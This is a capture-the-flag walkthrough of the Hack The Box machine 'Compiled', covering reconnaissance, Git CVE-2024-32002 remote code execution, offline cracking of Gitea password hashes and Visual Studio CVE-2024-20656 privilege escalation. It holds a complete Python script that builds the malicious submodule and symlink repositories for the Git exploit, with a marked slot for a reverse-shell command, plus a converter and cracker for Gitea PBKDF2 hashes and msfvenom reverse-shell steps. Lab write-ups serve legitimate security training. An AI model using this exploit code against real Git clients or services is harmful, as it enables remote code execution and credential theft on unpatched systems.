Contents
- 1 Introduction to Compiled:
- 2 Objective:
- 3 Enumerating the Machine
- 4 Web Enumeration:
- 5 What is CVE-2024-32002?
- 6 CVE-2024-32002 Exploitation on Compiled machine
- 7 GIT exploitation on the machine
- 8 Enumerate the database using sqlite3
- 9 Escalate to Root Privileges Access on Compiled machine
- 10 CVE-2024-20656 Vulnerability on Compiled machine
- 11 Step-by-Step on the exploitation using CyberKill Chain Mindset
- 12 Obtaining the root flag
Introduction to Compiled:

In this write-up, we will explore the “Compiled” machine from Hack The Box, which is categorized as a medium-difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.
Objective:
The goal of this walkthrough is to complete the “Compiled” machine from Hack The Box by achieving the following objectives:
User Flag:
Steps for Analyzing the Vulnerability:
First, review the source code for anything pointing at a recent CVE. Hints can also arrive out of band: if the server clones a repository from an HTTP server you control, the User-Agent header of that request identifies the Git client.
If you are still stuck, pay close attention to the Git version running on the server. Certain vulnerabilities are specific to particular Git releases, so the version narrows the search to the relevant issue.
Root Flag:
Because of the environment on the box, you may need to give the full path to certain Windows binaries that share a name with their Linux counterparts, so that the intended binary runs on the target.
For simple tasks I prefer evil-winrm, which is a straightforward way to interact with Windows hosts. For more involved post-exploitation enumeration I have often found that it performs poorly and is not sufficient.
Enumerating the Machine
Reconnaissance:
Nmap Scan:
Begin with a service scan of the target. The host does not answer probes to closed ports (nmap reports them as filtered), so disable host discovery with -Pn:
nmap -sC -sV -oA initial -Pn 10.10.11.26
Nmap Output:
┌─[darknite@parrot]─[~/Documents/htb/compiled]
└──╼ $nmap -sC -sV 10.10.11.26 -oA initial
# Nmap 7.94SVN scan initiated Thu Aug 1 08:04:22 2024 as: nmap -sC -sV -oA initial -Pn 10.10.11.26
Nmap scan report for 10.10.11.26 (10.10.11.26)
Host is up (0.014s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
3000/tcp open ppp?
| fingerprint-strings:
| GenericLines, Help, RTSPRequest:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Cache-Control: max-age=0, private, must-revalidate, no-transform
| Content-Type: text/html; charset=utf-8
| Set-Cookie: i_like_gitea=18a66487d368d8af; Path=/; HttpOnly; SameSite=Lax
| Set-Cookie: _csrf=4lEe7pSIJGCC7M7OFKOhI_5HsdA6MTcyMjUxMzQ2OTk5OTM3MDIwMA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
| X-Frame-Options: SAMEORIGIN
| Date: Thu, 01 Aug 2024 11:57:49 GMT
| <!DOCTYPE html>
| <html lang="en-US" class="theme-arc-green">
| <head>
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <title>Git</title>
| <link rel="manifest" href="data:application/json;base64,eyJuYW1lIjoiR2l0Iiwic2hvcnRfbmFtZSI6IkdpdCIsInN0YXJ0X3VybCI6Imh0dHA6Ly9naXRlYS5jb21waWxlZC5odGI6MzAwMC8iLCJpY29ucyI6W3sic3JjIjoiaHR0cDovL2dpdGVhLmNvbXBpbGVkLmh0YjozMDAwL2Fzc2V0cy9pbWcvbG9nby5wbmciLCJ0eXBlIjoiaW1hZ2UvcG5nIiwic2l6ZXMiOiI1MTJ4NTEyIn0seyJzcmMiOiJodHRwOi8vZ2l0ZWEuY29tcGlsZWQuaHRiOjMwMDA
| HTTPOptions:
| HTTP/1.0 405 Method Not Allowed
| Allow: HEAD
| Allow: GET
| Cache-Control: max-age=0, private, must-revalidate, no-transform
| Set-Cookie: i_like_gitea=d3a762ab7eae504f; Path=/; HttpOnly; SameSite=Lax
| Set-Cookie: _csrf=UXHCiLKMV_gysw1MW1p2jFJ6D5g6MTcyMjUxMzQ3NTE0Njc2MzcwMA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
| X-Frame-Options: SAMEORIGIN
| Date: Thu, 01 Aug 2024 11:57:55 GMT
|_ Content-Length: 0
5000/tcp open upnp?
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Server: Werkzeug/3.0.3 Python/3.12.3
| Date: Thu, 01 Aug 2024 11:57:50 GMT
| Content-Type: text/html; charset=utf-8
| Content-Length: 5234
| Connection: close
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="UTF-8">
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <title>Compiled - Code Compiling Services</title>
| <!-- Bootstrap CSS -->
| <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
| <!-- Custom CSS -->
| <style>
| your custom CSS here */
| body {
| font-family: 'Ubuntu Mono', monospace;
| background-color: #272822;
| color: #ddd;
| .jumbotron {
| background-color: #1e1e1e;
| color: #fff;
| padding: 100px 20px;
| margin-bottom: 0;
| .services {
| RTSPRequest:
| <!DOCTYPE HTML>
| <html lang="en">
| <head>
| <meta charset="utf-8">
| <title>Error response</title>
| </head>
| <body>
| <h1>Error response</h1>
| <p>Error code: 400</p>
| <p>Message: Bad request version ('RTSP/1.0').</p>
| <p>Error code explanation: 400 - Bad request syntax or unsupported method.</p>
| </body>
|_ </html>
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port3000-TCP:V=7.94SVN%I=7%D=8/1%Time=66AB7A3F%P=x86_64-pc-linux-gnu%r(
SF:GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x2
SF:0text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad
SF:\x20Request")%r(GetRequest,2AA4,"HTTP/1\.0\x20200\x20OK\r\nCache-Contro
SF:l:\x20max-age=0,\x20private,\x20must-revalidate,\x20no-transform\r\nCon
SF:tent-Type:\x20text/html;\x20charset=utf-8\r\nSet-Cookie:\x20i_like_gite
SF:a=18a66487d368d8af;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nSet-Cook
SF:ie:\x20_csrf=4lEe7pSIJGCC7M7OFKOhI_5HsdA6MTcyMjUxMzQ2OTk5OTM3MDIwMA;\x2
SF:0Path=/;\x20Max-Age=86400;\x20HttpOnly;\x20SameSite=Lax\r\nX-Frame-Opti
SF:ons:\x20SAMEORIGIN\r\nDate:\x20Thu,\x2001\x20Aug\x202024\x2011:57:49\x2
SF:0GMT\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en-US\"\x20class=\"them
SF:e-arc-green\">\n<head>\n\t<meta\x20name=\"viewport\"\x20content=\"width
SF:=device-width,\x20initial-scale=1\">\n\t<title>Git</title>\n\t<link\x20
SF:rel=\"manifest\"\x20href=\"data:application/json;base64,eyJuYW1lIjoiR2l
SF:0Iiwic2hvcnRfbmFtZSI6IkdpdCIsInN0YXJ0X3VybCI6Imh0dHA6Ly9naXRlYS5jb21waW
SF:xlZC5odGI6MzAwMC8iLCJpY29ucyI6W3sic3JjIjoiaHR0cDovL2dpdGVhLmNvbXBpbGVkL
SF:mh0YjozMDAwL2Fzc2V0cy9pbWcvbG9nby5wbmciLCJ0eXBlIjoiaW1hZ2UvcG5nIiwic2l6
SF:ZXMiOiI1MTJ4NTEyIn0seyJzcmMiOiJodHRwOi8vZ2l0ZWEuY29tcGlsZWQuaHRiOjMwMDA
SF:")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20te
SF:xt/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x2
SF:0Request")%r(HTTPOptions,197,"HTTP/1\.0\x20405\x20Method\x20Not\x20Allo
SF:wed\r\nAllow:\x20HEAD\r\nAllow:\x20GET\r\nCache-Control:\x20max-age=0,\
SF:x20private,\x20must-revalidate,\x20no-transform\r\nSet-Cookie:\x20i_lik
SF:e_gitea=d3a762ab7eae504f;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nSe
SF:t-Cookie:\x20_csrf=UXHCiLKMV_gysw1MW1p2jFJ6D5g6MTcyMjUxMzQ3NTE0Njc2Mzcw
SF:MA;\x20Path=/;\x20Max-Age=86400;\x20HttpOnly;\x20SameSite=Lax\r\nX-Fram
SF:e-Options:\x20SAMEORIGIN\r\nDate:\x20Thu,\x2001\x20Aug\x202024\x2011:57
SF::55\x20GMT\r\nContent-Length:\x200\r\n\r\n")%r(RTSPRequest,67,"HTTP/1\.
SF:1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=u
SF:tf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port5000-TCP:V=7.94SVN%I=7%D=8/1%Time=66AB7A40%P=x86_64-pc-linux-gnu%r(
SF:GetRequest,10A5,"HTTP/1\.1\x20200\x20OK\r\nServer:\x20Werkzeug/3\.0\.3\
SF:x20Python/3\.12\.3\r\nDate:\x20Thu,\x2001\x20Aug\x202024\x2011:57:50\x2
SF:0GMT\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:
SF:\x205234\r\nConnection:\x20close\r\n\r\n<!DOCTYPE\x20html>\n<html\x20la
SF:ng=\"en\">\n<head>\n\x20\x20\x20\x20<meta\x20charset=\"UTF-8\">\n\x20\x
SF:20\x20\x20<meta\x20name=\"viewport\"\x20content=\"width=device-width,\x
SF:20initial-scale=1\.0\">\n\x20\x20\x20\x20<title>Compiled\x20-\x20Code\x
SF:20Compiling\x20Services</title>\n\x20\x20\x20\x20<!--\x20Bootstrap\x20C
SF:SS\x20-->\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"https:
SF://stackpath\.bootstrapcdn\.com/bootstrap/4\.5\.2/css/bootstrap\.min\.cs
SF:s\">\n\x20\x20\x20\x20<!--\x20Custom\x20CSS\x20-->\n\x20\x20\x20\x20<st
SF:yle>\n\x20\x20\x20\x20\x20\x20\x20\x20/\*\x20Add\x20your\x20custom\x20C
SF:SS\x20here\x20\*/\n\x20\x20\x20\x20\x20\x20\x20\x20body\x20{\n\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20font-family:\x20'Ubuntu\x20Mono'
SF:,\x20monospace;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20backgr
SF:ound-color:\x20#272822;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20color:\x20#ddd;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\x20\x20\x20\x20\
SF:x20\x20\x20\x20\.jumbotron\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20background-color:\x20#1e1e1e;\n\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20color:\x20#fff;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20padding:\x20100px\x2020px;\n\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20margin-bottom:\x200;\n\x20\x20\x20\x20\x20\x20\x20\x20
SF:}\n\x20\x20\x20\x20\x20\x20\x20\x20\.services\x20{\n\x20")%r(RTSPReques
SF:t,16C,"<!DOCTYPE\x20HTML>\n<html\x20lang=\"en\">\n\x20\x20\x20\x20<head
SF:>\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20charset=\"utf-8\">\n\x20\x2
SF:0\x20\x20\x20\x20\x20\x20<title>Error\x20response</title>\n\x20\x20\x20
SF:\x20</head>\n\x20\x20\x20\x20<body>\n\x20\x20\x20\x20\x20\x20\x20\x20<h
SF:1>Error\x20response</h1>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20c
SF:ode:\x20400</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Message:\x20Bad\x20
SF:request\x20version\x20\('RTSP/1\.0'\)\.</p>\n\x20\x20\x20\x20\x20\x20\x
SF:20\x20<p>Error\x20code\x20explanation:\x20400\x20-\x20Bad\x20request\x2
SF:0syntax\x20or\x20unsupported\x20method\.</p>\n\x20\x20\x20\x20</body>\n
SF:</html>\n");
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Aug 1 08:07:57 2024 -- 1 IP address (1 host up) scanned in 214.75 seconds
Analysis:
- Port 3000 (HTTP): Gitea, a self-hosted Git service. The i_like_gitea cookie gives it away, and the base64 web manifest in the response decodes to a start_url of http://gitea.compiled.htb:3000/, which reveals the virtual host name.
- Port 5000 (HTTP): a Python Flask application served by Werkzeug/3.0.3 on Python/3.12.3, titled "Compiled - Code Compiling Services".
- The remaining 998 of the top 1,000 TCP ports are filtered, so everything starts from these two web services.
Map compiled.htb and gitea.compiled.htb to 10.10.11.26 in /etc/hosts before browsing.
Web Enumeration:
Perform web enumeration to discover potentially exploitable directories and files.
Web Application Exploration:

A Gitea instance is running on port 3000.

It hosts two public projects owned by the user Richard, which we can browse without logging in.


The “Compiled” project is the source of the code compiling service: users submit a Git repository URL and the service compiles the C++, C#, or .NET project. When hosted locally it listens on http://localhost:5000, which matches the Flask service nmap found on port 5000.

Inside the repository there is a small Flask application, app.py. Let’s analyze the code.
Analysis of app.py source code:
This script is a lightweight web application built with Python and Flask. An overview of its functionality:
- Purpose: The app serves a page where users submit a Git repository URL. If the URL passes the check, it is appended to a text file for later use, namely cloning and compiling the repository.
- Key features:
  - Flask framework: a single route handles both displaying the form and processing submissions.
  - Repository management: submitted URLs are stored in a local file (repos.txt) for tracking.
- User interaction:
  - The homepage (/) displays a form for URL input.
  - After submission the app validates the URL, but only superficially; the validation logic is not fully implemented in the code.
  - Valid URLs are saved and a success message is displayed: “Your git repository is being cloned for compilation.”
  - Invalid URLs produce the error message: “Invalid Git repository URL.”
- How it works: when run, the app listens on http://localhost:5000 and is used through a browser. Users enter URLs, which are checked and saved.
The security-relevant detail is that app.py never runs Git itself. Cloning happens out of band, by whatever process consumes repos.txt, so the URL we submit ends up as an argument to the Git binary installed on the server, and the safety of the service rests entirely on that Git version.

There isn’t much to analyze or investigate further in the Calculator directory.

The screenshot shows the Git version installed on the target machine: 2.45.0.

A search through an online vulnerability database shows that this version is affected by a critical vulnerability, CVE-2024-32002.
What is CVE-2024-32002?
Git is a version control system. Prior to versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4, repositories containing submodules could be crafted to exploit a bug in Git that tricks it into writing files not into the submodule’s worktree but into the .git/ directory. Consequently, an attacker could plant a hook that executes during the clone operation, before the user has any chance to inspect the code. The issue is fixed in the patched versions listed above. If symbolic link support is disabled in Git (for example with git config --global core.symlinks false), the attack does not work. As a general precaution, avoid cloning repositories from untrusted sources.
Compiled.htb:5000 enumeration

The “Compiled” project whose source we just read on Gitea is the application running on http://10.10.11.26:5000: it lets users submit a URL to have C++, C#, and .NET projects compiled online. This functionality resembles an older HTB machine that was affected by the same RCE vulnerability. From the source we know the URL must start with “http://” and end with “.git”; once accepted it is handed to Git on the target Windows machine, which fetches the repository along with whatever it contains.

We can enter the Git repository URL in the field provided above.

Let’s submit a URL pointing at a web server on our own machine and watch for the incoming request.

It worked: the target fetched from our server, confirming that a Git client on the box follows whatever URL we submit.
CVE-2024-32002 Exploitation on Compiled machine
Next, search for how this version is exploited. A good reference is https://amalmurali.me/posts/git-rce/.
The article explains how a symbolic link checked out into the repository, combined with a submodule whose path resolves through that link, makes Git write a hook into the .git directory, and it walks through turning that into remote code execution.

Let’s create a new account on the Gitea application.



We need to create two repositories; their names do not matter. One holds the hook script, the other references it as a submodule and carries the symbolic link that redirects the submodule checkout into the .git directory.
GIT exploitation on the machine


















The screenshots show the two malicious repositories being built with Git.
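The two-repository setup the screenshots build, reconstructed in Python as an added example for this write-up (these are not the author's commands or the script from the linked article, although the layout follows that article). It assumes `git` is on PATH, that you build on a Linux host, and that the hook repository is reachable by the target under whatever you pass as `hook_url` (on the box, the Gitea URL of the hook repository you created; it defaults to the local path so the pair can be inspected offline). The hook body is a placeholder that drops a marker file; the reverse-shell command goes there. A recursive clone with `core.symlinks=true` on a case-insensitive filesystem, as Git for Windows on the target, runs the hook; a patched Git aborts the clone instead, which is also how you verify a fix.

```python
import hashlib
import subprocess
import sys
from pathlib import Path
from typing import Optional

# Placeholder hook body: writes a marker file. On the target this is where the
# reverse-shell command goes; Git for Windows runs hooks through its own sh.
HOOK_SCRIPT = "#!/bin/sh\necho 'post-checkout hook executed' > /tmp/cve-2024-32002.txt\n"

# Identity and settings every git call needs. protocol.file.allow only matters
# when the submodule URL is a local path instead of an http(s) URL.
GIT_OPTS = ["-c", "user.name=poc", "-c", "user.email=poc@example.invalid",
            "-c", "protocol.file.allow=always", "-c", "commit.gpgsign=false"]


def git(*args, cwd, stdin: Optional[str] = None) -> str:
    """Run one git command in cwd and return its stdout; raises on failure."""
    return subprocess.run(["git", *GIT_OPTS, *args], cwd=cwd, input=stdin,
                          check=True, capture_output=True, text=True).stdout.strip()


def blob_hash(data: bytes) -> str:
    """Object id git assigns to a blob (what `git hash-object` prints)."""
    return hashlib.sha1(b"blob %d\0" % len(data) + data).hexdigest()


def index_info_line(oid: str, path: str, mode: str = "120000") -> str:
    """One line for `git update-index --index-info`; mode 120000 is a symlink."""
    return f"{mode} {oid} 0\t{path}\n"


def build_repos(base: Path, hook_url: Optional[str] = None) -> Path:
    """Create <base>/hook (carries the hook script) and <base>/captain (adds it
    as a submodule and ships the symlink). Returns the captain repo path."""
    hook, captain = base / "hook", base / "captain"
    for d in (hook, captain):
        d.mkdir(parents=True, exist_ok=True)
        git("init", "-q", "-b", "main", cwd=d)

    # 1. hook repo: the worktree path y/hooks/post-checkout is a plain file here
    script = hook / "y" / "hooks" / "post-checkout"
    script.parent.mkdir(parents=True, exist_ok=True)
    script.write_text(HOOK_SCRIPT)
    script.chmod(0o755)
    git("add", ".", cwd=hook)
    git("commit", "-q", "-m", "hook", cwd=hook)

    # 2. captain repo: submodule *named* x/y checked out at *path* A/modules/x
    git("submodule", "add", "--name", "x/y", hook_url or str(hook),
        "A/modules/x", cwd=captain)
    git("commit", "-q", "-m", "add-submodule", cwd=captain)

    # 3. symlink 'a' -> '.git', written straight into the index so no real
    #    symlink has to exist on the attacker's filesystem
    oid = git("hash-object", "-w", "--stdin", cwd=captain, stdin=".git")
    assert oid == blob_hash(b".git")
    git("update-index", "--index-info", cwd=captain, stdin=index_info_line(oid, "a"))
    git("commit", "-q", "-m", "add-symlink", cwd=captain)
    return captain


def trigger(captain: Path, dest: Path) -> int:
    """What the victim does. With core.symlinks on and a case-insensitive
    filesystem, 'A/modules/x' resolves through the symlink 'a' into
    .git/modules/x, so the submodule's y/hooks/post-checkout is written into
    its own hooks directory and runs at the end of checkout. Returns git's
    exit code; a patched git refuses the clone and exits non-zero."""
    return subprocess.run(["git", "-c", "core.symlinks=true", "clone",
                           "--recursive", str(captain), str(dest)], check=False).returncode


if __name__ == "__main__":
    base = Path(sys.argv[1] if len(sys.argv) > 1 else "cve-2024-32002-poc").resolve()
    print("captain repo ready at", build_repos(base))
```

Push both repositories to the Gitea account created above (with `hook_url` set to the Gitea URL of the hook repository), then submit the captain repository's URL to the Compiled service.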

Now submit the URL of the repository we prepared to the Compiled service, so that the target clones it and runs the hook.


After waiting for a few seconds, we obtain a reverse shell as the user Richard.
Enumerate the database using sqlite3



We locate the gitea.db file, the SQLite database behind the Gitea instance, and download it to our local machine so we can enumerate it offline.

The value “pbkdf2$50000$50” in the passwd_hash_algo column means PBKDF2 with 50,000 iterations and a 50-byte derived key (100 hex characters in the passwd column). The trailing 50 is the output length, not the salt; the salt is stored separately in the salt column. Gitea’s PBKDF2 uses HMAC-SHA256. PBKDF2 is a key derivation function: the salt defeats rainbow tables and the iteration count slows down each guess, but 50,000 iterations of SHA-256 are cheap on modern hardware, so weak passwords still fall to a wordlist attack.
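An added example (not code from the write-up or from Gitea) that reads the relevant columns out of gitea.db, converts a record into the line hashcat mode 10900 (PBKDF2-HMAC-SHA256) expects, and verifies a candidate in pure Python. The salt handling mirrors Gitea's own code as I understand it: a 32-character hex salt is decoded to 16 bytes, while a 10-character legacy salt is used as raw bytes; if a record refuses to crack, check that assumption first. The demo record at the bottom is constructed here (salt chosen, digest computed for the password the write-up recovered); it is not the box's gitea.db row.

```python
import base64
import binascii
import hashlib
import re
import sqlite3
from typing import Iterable, List, Optional, Tuple

_ALGO_RE = re.compile(r"^pbkdf2\$(\d+)\$(\d+)$")


def parse_algo(algo: str) -> Tuple[int, int]:
    """'pbkdf2$50000$50' -> (iterations, derived key length in bytes)."""
    m = _ALGO_RE.match(algo)
    if not m:
        raise ValueError(f"unsupported passwd_hash_algo: {algo!r}")
    return int(m.group(1)), int(m.group(2))


def salt_bytes(salt: str) -> bytes:
    """Hex salts are decoded; a 10-char legacy salt (or non-hex) is used raw."""
    if len(salt) != 10:
        try:
            return binascii.unhexlify(salt)
        except (binascii.Error, ValueError):
            pass
    return salt.encode()


def pbkdf2_hex(password: str, salt: bytes, iterations: int, keylen: int) -> str:
    """PBKDF2-HMAC-SHA256, hex-encoded like the passwd column."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations, keylen).hex()


def hashcat_line(algo: str, salt: str, passwd_hex: str) -> str:
    """hashcat -m 10900 format: sha256:<iterations>:<b64 salt>:<b64 hash>."""
    iterations, _ = parse_algo(algo)
    b64 = lambda b: base64.b64encode(b).decode()
    return f"sha256:{iterations}:{b64(salt_bytes(salt))}:{b64(bytes.fromhex(passwd_hex))}"


def crack(algo: str, salt: str, passwd_hex: str, candidates: Iterable[str]) -> Optional[str]:
    """Check candidates one by one; fine for a short list, use hashcat otherwise."""
    iterations, keylen = parse_algo(algo)
    sb = salt_bytes(salt)
    target = passwd_hex.lower()
    for cand in candidates:
        if pbkdf2_hex(cand, sb, iterations, keylen) == target:
            return cand
    return None


def load_users(db_path: str) -> List[Tuple[str, str, str, str]]:
    """(name, passwd, passwd_hash_algo, salt) rows from Gitea's user table."""
    with sqlite3.connect(db_path) as con:
        return con.execute(
            "SELECT name, passwd, passwd_hash_algo, salt FROM user").fetchall()


# Constructed demo record, not the box's data.
DEMO_ALGO = "pbkdf2$50000$50"
DEMO_SALT = "00112233445566778899aabbccddeeff"
DEMO_HASH = pbkdf2_hex("12345678", salt_bytes(DEMO_SALT), 50000, 50)

if __name__ == "__main__":
    print(hashcat_line(DEMO_ALGO, DEMO_SALT, DEMO_HASH))
    print("cracked:", crack(DEMO_ALGO, DEMO_SALT, DEMO_HASH,
                            ["password", "letmein", "12345678"]))
```

For the real database, feed each row from `load_users("gitea.db")` through `hashcat_line` and run `hashcat -m 10900` on the result with a wordlist such as rockyou.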


After a while, the hash for the user emily cracks to 12345678.

We can view the user flag by executing the command type user.txt.
Escalate to Root Privileges Access on Compiled machine
CVE-2024-20656 Exploitation

Visual Studio sets up NFS Exports Files, which relate to the configuration and permission settings of the Network File System (NFS) on Windows. NFS lets a host access files over a network as if they were local storage and is commonly used for file sharing between UNIX/Linux and Windows systems.
Such a configuration can lead to unauthorized access or privilege escalation, and it points to CVE-2024-20656, a local privilege escalation in the VSStandardCollectorService150 service of Microsoft Visual Studio. The flaw lies in how the service handles file operations and directory permissions, which lets a local user escalate privileges on a Windows system.
I noticed that Visual Studio 2019 is installed on the victim machine.
CVE-2024-20656 Vulnerability on Compiled machine

Researching the CVE turns up a GitHub repository with a proof of concept that we can use here.


Step-by-Step on the exploitation using CyberKill Chain Mindset
1. Reconnaissance: The attacker finds VSDiagnostics.exe on the target, the command-line front end that starts a diagnostic session through the collector service, and notes that the scratch location it accepts via /scratchLocation can point anywhere the attacker can write.
2. Weaponization: The attacker creates a junction point at that scratch location, redirecting it to a directory they control, so that the service’s file moves and permission changes land where the attacker wants them.
3. Delivery: The attacker starts a diagnostic session with VSDiagnostics.exe and the malicious scratch location, forcing the service to operate on the attacker-controlled directory.
4. Exploitation: The service resets the DACLs (Discretionary Access Control Lists) of the files in that directory. By pointing the junction at a directory such as C:\ProgramData, the attacker has the privileged service rewrite permissions on files it should never touch.
5. Installation: The attacker aims the DACL reset at sensitive system files or directories, such as DLLs loaded by privileged services, and then modifies them.
6. Command and Control: Code planted this way runs in the privileged context, giving the attacker arbitrary execution at a higher privilege level.
7. Action on Objectives: To adapt the exploit, open Expl.sln in Visual Studio and change the cmd variable in main.cpp to the path of VSDiagnostics.exe on this host, because the POC targets Visual Studio 2022 while the target runs Visual Studio 2019.
Obtaining the root flag

Next, we prepare the reverse shell executable in the directory the exploit expects. Using msfvenom, we generate a reverse shell payload and upload it to that folder.
Then we build the modified main.cpp in Release mode to produce the exploit executable.


We can view the root flag by executing the command type root.txt.